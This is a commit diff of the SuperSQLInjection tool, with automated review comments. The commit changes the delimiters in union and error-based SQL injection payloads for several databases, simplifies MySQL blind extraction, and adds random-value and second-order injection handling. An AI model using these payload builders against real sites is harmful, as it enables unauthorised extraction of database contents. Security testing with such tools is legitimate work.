
Commit c89bc8f

shack2shack2
authored and committed
更新分隔符问题
1 parent bbe5a27 commit c89bc8f

10 files changed

Lines changed: 61 additions & 60 deletions


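--- a/SuperSQLInjection/Main.cs
+++ b/SuperSQLInjection/Main.cs
@@ -286,7 +286,7 @@ public void HttpDownloadFile(string url, string path)
 responseStream.Close();
 }
 
-public static int version = 20200209;
+public static int version = 20200527;
 public static string versionURL = "http://www.shack2.org/soft/getNewVersion?ENNAME=SSuperSQLInjection&NO=" + URLEncode.UrlEncode(Tools.getSystemSid()) + "&VERSION=" + version;
 //检查更新
 public void checkUpdate()
@@ -792,10 +792,8 @@ private void StopThread()
 this.txt_log.Invoke(new showLogDelegate(log), "发出停止线程信号!", LogLevel.info);
 stp.Cancel();
 this.currentThread.Abort();
-
 }
 status = 0;
-
 }
 
 public void getVariablesByUnion(DBType dbType)
@@ -2710,11 +2708,9 @@ public int getValue(String payLoadStr, int start, int end)
 {
 //2分法获取中间数字
 mid = Tools.getLargeNum(start, end);
-
 payload = ByPassForBetween(payLoadStr, mid);
 ServerInfo server = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
 Boolean exists = Tools.isTrue(server, config.key, config.reverseKey, config.keyType, config.injectHTTPCode);
-
 if (end == start)
 {
 if (exists)
@@ -2723,9 +2719,7 @@ public int getValue(String payLoadStr, int start, int end)
 }
 else
 {
-
 return end;
-
 }
 }
 if (exists)
@@ -5141,47 +5135,21 @@ public void getDataValueByBoolByMySQL(Object opam)
 String va_payload = MySQL.ver_value.Replace("{data}", data_payload);
 String colvalue = "";
 
-//获取值
 for (int i = 1; i <= len; i++)
 {
-String tmp_va_payload = MySQL.ord_value.Replace("{data}", data_payload).Replace("{index}", i + "");
-String plen = MySQL.ver_length.Replace("{data}", tmp_va_payload);
-int mu_payload_len = 0;
-//MySQL多字节ord,先判断ord后的长度,在取每一个的值
+String tmp_va_payload = va_payload.Replace("{index}", i + "");
+int ascii = 0;
 if (config.keyType.Equals(KeyType.Time))
 {
-mu_payload_len = getValue(MySQL.getBoolDataBySleep(MySQL.char_len.Replace("{data}", tmp_va_payload), config.maxTime), 2, 8);
+ascii = getValue(tmp_va_payload, 0, 127);
 }
 else
 {
-mu_payload_len = getValue(plen, 2, 8);
+ascii = getValue(tmp_va_payload, 0, 127);
 }
-
-//判断ord转换后的字符长度
-
-int m_index = 1;
-String[] ver_tmp = new String[mu_payload_len];
-while (m_index <= mu_payload_len)
-{
-
-int ascii = 0;
-if (config.keyType.Equals(KeyType.Time))
-{
-ascii = getValue(MySQL.getBoolDataBySleep(MySQL.mid_value.Replace("{data}", tmp_va_payload).Replace("{index}", m_index + ""), config.maxTime), 0, 9);
-}
-else
-{
-ascii = getValue(MySQL.bool_ord_value.Replace("{data}", tmp_va_payload).Replace("{index}", m_index + ""), 0, 9);
-}
-ver_tmp[m_index - 1] = ascii + "";
-m_index++;
-}
-//设置值,这里由于是hex值,需要转换
-String hexstring = Tools.convertToString(ver_tmp);
-String hexvalue = Convert.ToString(int.Parse(hexstring), 16);
-colvalue += Tools.unHex(hexvalue, config.db_encoding);
-
+colvalue += ((char)ascii).ToString();
 }
+
 if (lvi == null)
 {
 lvi = new ListViewItem(colvalue);
@@ -6043,6 +6011,7 @@ public void getDataValueByErrorBySQLServer(Object opam)
 GetDataPam gp = (GetDataPam)opam;
 ListViewItem lvi = new ListViewItem();
 String result = getOneDataByUnionOrError(SQLServer.getErrorDataValue(gp.dbname, gp.table, gp.limit, gp.columns));
+
 result = HttpUtility.HtmlDecode(result);
 //数结果改成xml格式,单独解析
 addItemToListViewBySQLServerXMLData(result, gp.columns);
@@ -10804,7 +10773,15 @@ private void btn_inject_setTokenLocation_Click(object sender, EventArgs e)
 
 private void btn_inject_randStr_Click(object sender, EventArgs e)
 {
-this.txt_inject_request.SelectedText = "<Rand>" + this.txt_inject_request.SelectedText + "</Rand>";
+if (this.txt_inject_request.SelectedText.Length > 0)
+{
+this.txt_inject_request.SelectedText = "<Rand>" + this.txt_inject_request.SelectedText + "</Rand>";
+
+}
+if (this.txt_sencond_request.SelectedText.Length > 0)
+{
+this.txt_sencond_request.SelectedText = "<Rand>" + this.txt_sencond_request.SelectedText + "</Rand>";
+}
 }
 
 private void txt_sencond_request_TextChanged(object sender, EventArgs e)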
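Review bot: In the getDataValueByBoolByMySQL hunk the `if (config.keyType.Equals(KeyType.Time))` and `else` branches now have identical bodies, `ascii = getValue(tmp_va_payload, 0, 127);`, so the conditional is dead code; either collapse it to the single assignment or add a comment explaining why a separate key-type path is still kept (the removed code treated the Time branch differently, so a reader will assume the duplication is a slip). The cast on `colvalue += ((char)ascii).ToString();` silently assumes getValue returns a value inside the 0..127 bounds it was given; a one-line comment stating that assumption on the same line would spare the next maintainer from re-deriving it. getDataValueByBoolByMySQL begins and ends outside the hunk.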

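--- a/SuperSQLInjection/bypass/StringReplace.cs
+++ b/SuperSQLInjection/bypass/StringReplace.cs
@@ -11,10 +11,25 @@ namespace SuperSQLInjection.bypass
 {
 class StringReplace
 {
-public static String strReplaceCenter(Config config, String request, Hashtable replaceList)
+public static String lastRand = "";
+public static String lastpayload = "";
+public static String strReplaceCenter(Config config, String request, Hashtable replaceList,String payload)
 {
 //修改随机值
-request = Regex.Replace(request, "(\\<Rand\\>[.\\s\\S]*?\\<\\/Rand\\>)", System.Guid.NewGuid().ToString("N"));
+String rand = "";
+if (payload.Equals(lastpayload)) {
+rand = lastRand;
+}
+else {
+rand = System.Guid.NewGuid().ToString("N");
+}
+
+if (payload.Equals("请求二次注入页面")) {
+rand = lastRand;
+}
+request = Regex.Replace(request, "(\\<Rand\\>[.\\s\\S]*?\\<\\/Rand\\>)", rand);
+lastRand = rand;
+lastpayload = payload;
 //找到需要处理的字符
 MatchCollection mc = Regex.Matches(request, "(?<=(\\<Encode\\>))[.\\s\\S]*?(?=(\\<\\/Encode\\>))");
 String str="";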
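Review bot: `lastRand` and `lastpayload` are public static mutable fields written on every call of strReplaceCenter with no synchronization, and the callers added in HTTP.cs (sendHTTPRequest and sendHTTPSRequest) sit on a path that Main.cs drives from worker threads, so two concurrent calls can observe each other's `lastRand`; either guard the read-compare-write with a private lock object or document on the declarations that the class is single-threaded by design. `payload.Equals(lastpayload)` throws NullReferenceException if a caller passes null; `string.Equals(payload, lastpayload, StringComparison.Ordinal)` is null-safe and makes the comparison kind explicit. The sentinel `"请求二次注入页面"` is a magic string that also appears as a payload label elsewhere; hoist it to a named constant and fold it into the first condition, e.g. `if (payload.Equals(lastpayload) || payload.Equals(SecondRequestMarker)) { rand = lastRand; } else { rand = System.Guid.NewGuid().ToString("N"); }`, which removes the second assignment. strReplaceCenter continues past the end of the hunk.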

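--- a/SuperSQLInjection/payload/Comm.cs
+++ b/SuperSQLInjection/payload/Comm.cs
@@ -8,8 +8,8 @@ namespace SuperSQLInjection.payload
 class Comm
 {
 
-public const String COLUMNS_SPLIT_STR = "$_$";
-public const String COLUMNS_REG_SPLIT_STR = "\\$_\\$";
+public const String COLUMNS_SPLIT_STR = "$\t$";
+public const String COLUMNS_REG_SPLIT_STR = "\\$\\t\\$";
 
 public static String COLUMNS_SPLIT_HEX_STR = Tools.strToHex(COLUMNS_SPLIT_STR, "UTF-8");
 public static String exists_table = " exists(select 1 from {0})";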
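Review bot: The new delimiter is now spelled in two unrelated ways — once as `COLUMNS_SPLIT_STR = "$\t$"` here, and again as the hard-coded `chr(36)||chr(9)||chr(36)` / `char(36)||char(9)||char(36)` fragments in DB2.cs, Oracle.cs (two places), PostgreSQL.cs (two places) and SQLite.cs — so the next delimiter change has to touch six sites and nothing ties them together. Add a comment on the constant naming the mirrors, e.g. `// Column delimiter; DB2/Oracle/PostgreSQL/SQLite payload builders spell this out with chr()/char() and must be kept in sync`, or build those fragments from the constant so there is a single source of truth. `COLUMNS_REG_SPLIT_STR` works only because the regex engine expands the `\t` escape into the same tab character that sits literally in `COLUMNS_SPLIT_STR`; a short comment stating that would save the next reader from checking it, and `COLUMNS_SPLIT_HEX_STR` already follows the constant so it needs no change.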

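--- a/SuperSQLInjection/payload/DB2.cs
+++ b/SuperSQLInjection/payload/DB2.cs
@@ -82,7 +82,7 @@ public static String unionColumns(List<String> columns, String unionStr)
 
 public static String getUnionDataValue(String unionFileTemplate, List<String> columns, String dbname, String table, String index)
 {
-String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns,"||chr(36)||chr(36)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
+String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns,"||chr(36)||chr(9)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
 String template= unionFileTemplate.Replace("{data}", (data_no_cast_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index)));
 return union_value.Replace("{data}", template);
 }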

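--- a/SuperSQLInjection/payload/Informix.cs
+++ b/SuperSQLInjection/payload/Informix.cs
@@ -38,7 +38,7 @@ class Informix
 
 public static String substr = "substr(({data})),{index},1)";
 //多字节
-public static String hex_value = "ascii({data})";
+//public static String hex_value = "ascii({data})";
 
 //bool方式字符长度判断
 public static String bool_length = " length(({data}))>{len}";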
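Review bot: `hex_value` is commented out rather than deleted, and PostgreSQL.cs does the same with its `hex` field; once this commit exists the old text lives in history, so commented-out declarations only accumulate. Delete the line, and if the field is being retired only temporarily, replace it with a one-line comment saying why, e.g. `// hex_value removed: no longer referenced by the bool/time readers`, so the next reader is not left guessing whether it is safe to clean up.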

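--- a/SuperSQLInjection/payload/Oracle.cs
+++ b/SuperSQLInjection/payload/Oracle.cs
@@ -91,7 +91,7 @@ public static String getUnionDataValue(int columnsLen, int showIndex, String dat
 public static String getUnionDataValue(int columnsLen, int showIndex, List<String> columns, String dbname, String table, String index)
 {
 StringBuilder sb = new StringBuilder();
-String data = "chr(94)||chr(94)||chr(33)||" + Comm.unionColumns(columns, "||chr(36)||chr(36)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
+String data = "chr(94)||chr(94)||chr(33)||" + Comm.unionColumns(columns, "||chr(36)||chr(9)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
 for (int i = 1; i <= columnsLen; i++)
 {
 if (i == showIndex)
@@ -163,7 +163,7 @@ public static String getBoolDataPayLoad(String column, String dbName, String tab
 public static String getDataValue(List<String> columns, String dbName, String table, String index)
 {
 StringBuilder sb = new StringBuilder();
-String data = Comm.unionColumns(columns, "||chr(36)||chr(36)||chr(36)||");
+String data = Comm.unionColumns(columns, "||chr(36)||chr(9)||chr(36)||");
 sb.Append(data_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index));
 sb.Append(",");
 sb.Remove(sb.Length - 1, 1);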

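--- a/SuperSQLInjection/payload/PostgreSQL.cs
+++ b/SuperSQLInjection/payload/PostgreSQL.cs
@@ -81,7 +81,7 @@ class PostgreSQL
 //error方式
 public static String error_value = " 1=cast((chr(94)||chr(94)||chr(33)||({data})||chr(33)||chr(94)||chr(94)) as numeric)";
 
-public static String hex = "(select hex({data}))";
+//public static String hex = "(select hex({data}))";
 public static String hex_value = "(select hex(convert(({data}) using UTF8)))";
 
 public static String substr_value = "(select substr({data},{start},{len}))";
@@ -126,7 +126,7 @@ public static String getBoolCountBySleep(String data, int maxTime)
 /// <param name="index">第几行数据,1开始</param>
 public static String getErrorDataValue(String dbname, String table, int index, List<String> columns)
 {
-String data = data_value.Replace("{columns}", unionColumns(columns, "||chr(36)||chr(36)||chr(36)||"));
+String data = data_value.Replace("{columns}", unionColumns(columns, "||chr(36)||chr(9)||chr(36)||"));
 String d = data.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index.ToString());
 return error_value.Replace("{data}", d);
 }
@@ -179,7 +179,7 @@ public static String getUnionDataValue(int columnsLen, int showIndex, String dat
 public static String getUnionDataValue(int columnsLen, int showIndex, List<String> columns, String dbname, String table, String index)
 {
 StringBuilder sb = new StringBuilder();
-String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns, "||chr(36)||chr(36)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
+String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns, "||chr(36)||chr(9)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
 for (int i = 1; i <= columnsLen; i++)
 {
 if (i == showIndex)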

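--- a/SuperSQLInjection/payload/SQLite.cs
+++ b/SuperSQLInjection/payload/SQLite.cs
@@ -52,7 +52,7 @@ class SQLite
 public static String getUnionDataValue(int columnsLen, int showIndex, String Fill, List<String> columns, String table, String index)
 {
 StringBuilder sb = new StringBuilder();
-String data = "char(94)||char(94)||char(33)||" + unionColumns(columns, "||char(36)||char(36)||char(36)||") + "||char(33)||char(94)||char(94)";
+String data = "char(94)||char(94)||char(33)||" + unionColumns(columns, "||char(36)||char(9)||char(36)||") + "||char(33)||char(94)||char(94)";
 for (int i = 1; i <= columnsLen; i++)
 {
 if (i == showIndex)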

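--- a/SuperSQLInjection/tools/Tools.cs
+++ b/SuperSQLInjection/tools/Tools.cs
@@ -498,7 +498,7 @@ public static Boolean isTrue(ServerInfo server,String key,Boolean reverKey,KeyTy
 
 
 case KeyType.Time:
-//由于计数器有误差(可能客户端计数小于服务端,如果页面正常响应时间非常快,可能导致返回时间可能提前,所以考虑设置一个误差值)
+//由于计数器有误差(可能客户端计数小于服务端,如果页面正常响应时间非常快,可能导致返回时间可能提前,所以考虑设置一个误差值)
 int time = Tools.convertToInt(key);
 if (server.runTime > (time*1000-(time*deviation)))
 {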

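--- a/SuperSQLInjection/tools/http/HTTP.cs
+++ b/SuperSQLInjection/tools/http/HTTP.cs
@@ -42,7 +42,7 @@ public class HTTP
 public const int WaitTime = 5;
 public static Main main = null;
 public static long index = 0;
-
+public static String LastToken ="";
 public const String Socks5ProxyType = "Socks5";
 
 public static String getTemplate = "GET /mysql.jsp?id=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240\r\nAccept-Encoding: gzip, deflate\r\nHost: 127.0.0.1:8090\r\nConnection: Close\r\nCookie: JSESSIONID=2F6D5F1AC8C376FF0AB48A08282A6CED";
@@ -82,6 +82,7 @@ public static ServerInfo sendRequestRetry(Boolean isSSL, int tryCount, String ho
 {
 ServerInfo tserver = HTTP.sendRequestRetryNoToken(isSSL, tryCount, host, port, "获取Token", main.config.token_request, timeout, encoding, foward_302, redirectDoGet);
 token = Tools.substr(tserver.body, main.config.token_startStr, main.config.token_endStr);
+
 }
 request = Regex.Replace(request, "(\\<Token\\>[.\\s\\S]*?\\<\\/Token\\>)", token);
 }
@@ -338,7 +339,7 @@ private static ServerInfo sendHTTPRequest(int count, String host, int port, Stri
 if (port > 0 && port <= 65556)
 {
 request = request.Replace(Main.setInjectStr, payload);
-request = StringReplace.strReplaceCenter(main.config, request, main.replaceList);
+request = StringReplace.strReplaceCenter(main.config, request, main.replaceList,payload);
 //编码处理
 server.request = request;
 
@@ -483,11 +484,15 @@ private static ServerInfo sendHTTPRequest(int count, String host, int port, Stri
 return sendHTTPRequest(count, host, port, payload, rsb.ToString(), timeout, encoding, false, redirectDoGet);
 }
 
+}
+//超时
+if (server.code >501&&server.code <505)
+{
+throw new Exception("http访问异常-code:"+ server.code+"!");
 }
 
-
-//根据请求头解析
-if (server.headers.ContainsKey(Content_Length)&& server.header.IndexOf(Content_Length_Zero) ==-1)
+//根据请求头解析
+if (server.headers.ContainsKey(Content_Length)&& server.header.IndexOf(Content_Length_Zero) ==-1)
 {
 int length = int.Parse(server.headers[Content_Length]);
 while (sum < length && sw.ElapsedMilliseconds <= timeout)
@@ -764,7 +769,7 @@ private static ServerInfo sendHTTPSRequest(int count, String host, int port, Str
 request = request.Replace(Main.setInjectStr, payload);
 
 //编码处理
-request = StringReplace.strReplaceCenter(main.config, request, main.replaceList);
+request = StringReplace.strReplaceCenter(main.config, request, main.replaceList,payload);
 TimeOutSocket tos = new TimeOutSocket();
 if (main.config.proxy_mode == 1 || main.config.proxy_mode == 2)
 {
@@ -920,7 +925,11 @@ private static ServerInfo sendHTTPSRequest(int count, String host, int port, Str
 
 
 }
-
+//超时
+if (server.code > 501 && server.code < 505)
+{
+throw new Exception("http访问异常-code:" + server.code + "!");
+}
 
 //根据请求头解析
 if (server.headers.ContainsKey(Content_Length) && server.header.IndexOf(Content_Length_Zero) == -1)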
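Review bot: The new status check `if (server.code >501&&server.code <505)` throws the base `Exception` type, which callers can only catch with a blanket `catch (Exception)`, and it is duplicated verbatim in sendHTTPSRequest; throw a specific type (a project exception class, or at least `InvalidOperationException`), replace the bare numbers with named bounds such as `const int GatewayErrorMin = 502, GatewayErrorMax = 504;`, and move the check into one shared helper both methods call. The `//超时` comment does not match the condition either: the range it admits is 502–504, which are gateway errors, and only 504 is a timeout, so the comment should say what is actually rejected. `LastToken` is added as a public static mutable field but no hunk shown here reads or writes it; if it is meant to be used by sendRequestRetry, a comment on its declaration stating who writes it and who reads it would help the next reader. Both sendHTTPRequest and sendHTTPSRequest extend beyond the hunks.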
